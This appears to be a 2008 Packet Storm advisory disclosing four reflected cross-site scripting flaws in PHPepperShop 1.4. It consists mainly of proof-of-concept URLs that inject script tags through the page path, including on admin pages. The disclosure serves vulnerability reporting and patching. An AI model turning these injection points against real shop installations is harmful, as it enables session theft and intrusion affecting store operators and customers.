PHPepperShop 1.4 Cross Site Scripting

2008-12-09T00:00:00
ID PACKETSTORM:72762
Type packetstorm
Reporter Michael Brooks
Modified 2008-12-09T00:00:00

Description

                                        
                                            `Vulnerable Version:PHPepperShop v 1.4  
Homepage:http://www.phpeppershop.com  
  
This is 4 reflective XSS flaws in the URI. Trust no one not even your $_SERVER[PHP_SELF]  
  
http://10.1.1.10/shop/kontakt.php/'<script>alert(1)</script>  
  
http://10.1.1.10/index.php/%22%3Cscript%3Ealert(1)%3C/script%3E  
  
http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/shop_kunden_mgmt.php/%22%3Cscript%3Ealert(1)%3C/script%3E  
  
http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/SHOP_KONFIGURATION.php/"<script>alert(1)</script>  
`